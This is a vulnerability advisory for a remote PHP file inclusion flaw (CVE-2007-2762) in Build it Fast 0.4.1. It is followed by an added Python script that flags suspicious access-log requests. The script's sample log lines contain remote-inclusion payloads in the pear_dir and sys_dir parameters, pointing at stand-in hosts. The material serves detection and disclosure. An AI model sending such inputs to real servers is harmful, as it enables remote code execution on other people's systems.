PT-2007-4076 · Bif3 · Build It Fast

Alkomandoz Hacker · Published 2007-05-18 · Updated 2017-10-11 · CVE-2007-2762

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

Build it Fast (bif3) version 0.4.1

Description

The issue allows remote attackers to execute arbitrary PHP code via a URL in the pear_dir parameter to Base/Application.php, or the sys_dir parameter to various PHP files in the Widgets/Base/ directory, including Footer.php, widget.BifContainer.php, widget.BifRoot.php, widget.BifRoot2.php, widget.BifRoot3.php, and widget.BifWarning.php.

Recommendations

For Build it Fast (bif3) version 0.4.1, consider restricting access to the pear_dir and sys_dir parameters in the affected PHP files until a patch is available. As a temporary workaround, avoid using the pear_dir parameter in the Base/Application.php file and the sys_dir parameter in the Footer.php, widget.BifContainer.php, widget.BifRoot.php, widget.BifRoot2.php, widget.BifRoot3.php, and widget.BifWarning.php files in the Widgets/Base/ directory.
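
An added example, not part of the original advisory or the bif3 project: a Python check over web access logs that flags requests to the affected scripts carrying the pear_dir or sys_dir parameter, which helps verify that the workaround above is holding. The log lines, hosts and the /bif3/ install prefix are constructed, and the underscore spelling of the parameter names is assumed from the CVE-2007-2762 entry.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Affected scripts and the parameter each one trusts, from the advisory text.
WIDGETS = ["Footer.php", "widget.BifContainer.php", "widget.BifRoot.php",
           "widget.BifRoot2.php", "widget.BifRoot3.php", "widget.BifWarning.php"]
AFFECTED = {"Base/Application.php": "pear_dir"}
AFFECTED.update({"Widgets/Base/" + name: "sys_dir" for name in WIDGETS})

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)  # scheme://, any case

def flag_requests(lines):
    """Return (line_no, script, param, kind) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        for script, param in AFFECTED.items():
            # Match on the path suffix because the install prefix varies.
            if not target.path.endswith("/" + script):
                continue
            # parse_qsl percent-decodes, so encoded URLs are caught too.
            for name, value in parse_qsl(target.query, keep_blank_values=True):
                if name == param:
                    # "param-set" is still reported: the workaround is that
                    # clients never supply this parameter at all.
                    kind = "remote-url" if REMOTE.match(value) else "param-set"
                    findings.append((number, script, param, kind))
    return findings

# Constructed sample log lines (documentation addresses, .invalid hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2007:10:00:01 +0000] "GET /bif3/index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [18/May/2007:10:00:07 +0000] "GET /bif3/Base/Application.php?pear_dir=http%3A%2F%2Fhost.invalid%2Fx HTTP/1.1" 200 87',
    '192.0.2.44 - - [18/May/2007:10:00:09 +0000] "GET /bif3/Widgets/Base/widget.BifRoot2.php?sys_dir=/srv/bif3/ HTTP/1.1" 200 90',
    '192.0.2.51 - - [18/May/2007:10:01:30 +0000] "GET /bif3/Widgets/Base/Footer.php?sys_dir=FTP://host.invalid/x HTTP/1.0" 200 90',
    '192.0.2.51 - - [18/May/2007:10:01:31 +0000] "GET /bif3/docs/page.php?sys_dir=http://host.invalid/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in flag_requests(SAMPLE_LOG):
        print(finding)
```

Only query-string parameters appear in access logs, so values sent in a POST body need a separate check at the application or WAF layer.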

Related Identifiers

CVE-2007-2762

Affected Products

Build It Fast